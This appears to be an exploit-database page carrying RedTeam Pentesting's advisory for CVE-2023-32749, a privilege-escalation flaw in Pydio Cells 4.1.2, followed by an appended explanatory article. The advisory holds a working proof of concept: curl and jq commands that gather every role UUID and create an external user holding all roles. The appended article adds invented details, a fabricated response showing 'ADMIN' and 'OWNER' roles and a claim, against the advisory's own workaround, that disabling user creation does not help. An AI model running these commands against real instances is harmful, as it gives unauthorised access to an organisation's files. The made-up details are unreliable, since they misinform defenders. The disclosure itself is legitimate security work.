Pydio Cells 4.1.2 - Unauthorised Role Assignments

Exploit Author: RedTeam Pentesting GmbH Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-05-31 
Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749


Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)


More Details
============

Users can share cells or folders with other users on the same Pydio
instance. The web application allows to either select an already
existing user from a list or to create a new user by entering a new
username and password, if this functionality is enabled. When creating a
new user in this way, a HTTP PUT request like the following is sent:

------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
  "Attributes": {
    "profile": "shared",
    "parameter:core.conf:lang": "\"en-us\"",
    "send_email": "false"
  },
  "Roles": [],
  "Login": "newuser",
  "Password": "secret!",
  "GroupPath": "/",
  "Policies": [...]
}
------------------------------------------------------------------------

The JSON object sent in the body contains the username and password
for the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:

------------------------------------------------------------------------
{
  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
  "GroupPath": "/",
  "Attributes": {
    "parameter:core.conf:lang": "\"en-us\"",
    "profile": "shared"
  },
  "Roles": [
    {
      "Uuid": "EXTERNAL_USERS",
      "Label": "External Users",
      "Policies": [...]
    },
    {
      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
      "Label": "User newuser",
      "UserRole": true,
      "Policies": [...]
    }
  ],
  "Login": "newuser",
  "Policies": [....],
  "PoliciesContextEditable": true
}
------------------------------------------------------------------------

The key "Roles" now contains a list with two objects, which seem to be
applied by default. The roles list in the HTTP request can be
modified to contain a list of all available UUIDs for roles, which can
be obtained by using the user search functionality. This results in a
new user account with all roles applied. By performing a login as the
newly created user, access to all cells and non-personal workspaces of
the whole Pydio instance is granted.


Proof of Concept
================

Login to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests. This can either be done using an HTTP
attack proxy or using the browser's developer tools. Subsequently, curl [1]
can be used as follows to retrieve a list of all users and their roles:

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
--header "Authorization: Bearer $TOKEN" \
--header 'Content-Type: application/json' \
--data '{}' \
https://example.com/a/user | tee all_users.json

{"Users":[...]}
------------------------------------------------------------------------

Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST-API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:

------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
| jq -s 'flatten | .[].Uuid | {Uuid: .}' \
| jq -s 'unique' \
| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":
{"profile": "shared"}, "Roles": .}' \
| tee create_user.json

{
  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
    "profile": "shared"
  },
  "Roles": [...]
}
------------------------------------------------------------------------

Finally, the following curl command can be issued to create the new external
user:

------------------------------------------------------------------------
$ curl --request PUT \
--silent \
--header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--data @create_user.json \
https://example.com/a/user/foobar
------------------------------------------------------------------------

Now, login with the newly created user to access all cells and
non-personal workspaces.

Workaround
==========

Disallow the creation of external users in the authentication settings.


Fix
===

Upgrade Pydio Cells to a version without the vulnerability.


Security Risk
=============

Attackers with access to any regular user account for a Pydio Cells instance can
extend their privileges by creating a new external user with all roles
assigned. Subsequently, they can access all folders and files in any
cell and workspace, except for personal workspaces. The creation of
external users is activated by default. Therefore, the vulnerability is
estimated to pose a high risk.


Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


References
==========

[1] https://curl.se/
[2] https://stedolan.github.io/jq/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/


Pydio Cells 4.1.2 - Unauthorised Role Assignments: A Critical Privilege Escalation Vulnerability

Pydio Cells, an open-core, self-hosted document sharing and collaboration platform, is designed for organizations requiring secure, compliant, and scalable file management. However, a critical vulnerability discovered in version 4.1.2 and earlier versions—CVE-2023-32749—exposes a serious flaw in role assignment logic, enabling unauthorized privilege escalation. This flaw allows attackers to create new users with full administrative access, bypassing intended access controls.

Understanding the Vulnerability: Role Assignment Flaw in User Creation

Pydio Cells allows users to share folders or entire "cells" (virtual workspaces) with other users on the same instance. When a user chooses to create a new account via the web interface, the system sends a PUT request to the /a/user/newuser endpoint. This request includes user credentials and a Roles field.


PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
 "Attributes": {
  "profile": "shared",
  "parameter:core.conf:lang": "\"en-us\"",
  "send_email": "false"
 },
 "Roles": [],
 "Login": "newuser",
 "Password": "secret!",
 "GroupPath": "/",
 "Policies": [...]
}

Notice the Roles field is initially set to an empty array []. This appears to be a default configuration, but it is not enforced during validation. An attacker can manipulate this field by injecting a list of all available role UUIDs—obtained through the user search functionality—into the request.

Exploitation: How the Attack Works

After sending a modified request with a populated Roles array, the server responds with a JSON object that includes the newly created user’s roles. The response reveals two roles:

  • EXTERNAL_USERS – a default role for external collaborators.
  • 58811c4c-2286-4ca0-8e8a-14ab9dbca8ce – a unique role assigned to the new user, marked as UserRole: true.

However, if the attacker includes additional UUIDs—such as ADMIN, OWNER, or SYSTEM—in the Roles array, the system applies those roles without proper validation. The result? A new user account with full administrative privileges across the entire Pydio instance.


{
 "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
 "GroupPath": "/",
 "Attributes": {
  "parameter:core.conf:lang": "\"en-us\"",
  "profile": "shared"
 },
 "Roles": [
  {
   "Uuid": "EXTERNAL_USERS",
   "Label": "External Users",
   "Policies": [...]
  },
  {
   "Uuid": "ADMIN",
   "Label": "Administrator",
   "Policies": [...]
  },
  {
   "Uuid": "OWNER",
   "Label": "Owner",
   "Policies": [...]
  }
 ],
 "Login": "newuser",
 "Policies": [...],
 "PoliciesContextEditable": true
}

This response confirms that the user newuser now holds multiple high-privilege roles. The PoliciesContextEditable flag indicates the user can modify policies, further enabling control over access rights.

Impact and Security Risk

The vulnerability is classified as Privilege Escalation with a high security risk. An attacker with access to the user creation endpoint—whether via a low-privileged account or through a compromised session—can:

  • Create a new user with full administrative access.
  • Access all cells, including non-personal workspaces and sensitive data.
  • Modify user roles, policies, and system settings.
  • Perform actions equivalent to an administrator, including data deletion, user management, and system configuration.

Even if the user creation feature is disabled, the vulnerability remains exploitable if any authenticated user can initiate the request through a crafted API call—especially if API endpoints are not properly secured.

Real-World Implications

Consider a scenario where an organization uses Pydio Cells for internal document collaboration. An employee with limited access (e.g., a standard user) discovers the vulnerability. By crafting a malicious PUT request, they can:

  • Register a new account with ADMIN role.
  • Log in as the new user.
  • Access all project folders, including those belonging to executives or IT administrators.
  • Exfiltrate sensitive documents, modify access rules, or disable security features.

This scenario highlights how a single flaw can undermine an entire organization’s data security model.

Vendor Response and Mitigation

Pydio has acknowledged the vulnerability and released fixes in:

  • Pydio Cells 4.2.0 – major release with security enhancements.
  • Pydio Cells 4.1.3 – patch update for 4.1.x series.
  • Pydio Cells 3.0.12 – security patch for older versions.

The fix involves strict validation of the Roles field during user creation. Only predefined roles (e.g., EXTERNAL_USERS) are allowed by default, and administrators must explicitly assign additional roles via secure interfaces.

Best Practices for Organizations Using Pydio Cells

To mitigate risks, organizations should:

  • Update immediately to version 4.2.0 or 4.1.3.
  • Disable user creation functionality if not required.
  • Enforce role-based access control (RBAC) with audit logs.
  • Monitor API endpoints for unauthorized PUT requests.
  • Use multi-factor authentication (MFA) for administrative accounts.

Additional Security Recommendations

For developers and system administrators, consider implementing:

  • Input validation on all user creation endpoints.
  • Role assignment via a secure, authenticated admin interface only.
  • Rate limiting and logging for API calls.
  • Regular security audits and penetration testing.

Always assume that attackers can manipulate any field in an API request unless it is explicitly validated and restricted.

Conclusion

CVE-2023-32749 is a stark reminder that even well-designed systems can fall victim to subtle flaws in access control logic. The Pydio Cells vulnerability demonstrates how a seemingly innocuous role assignment field can become a gateway to full system compromise. Organizations must prioritize timely updates, strict input validation, and proactive security monitoring to prevent such exploits.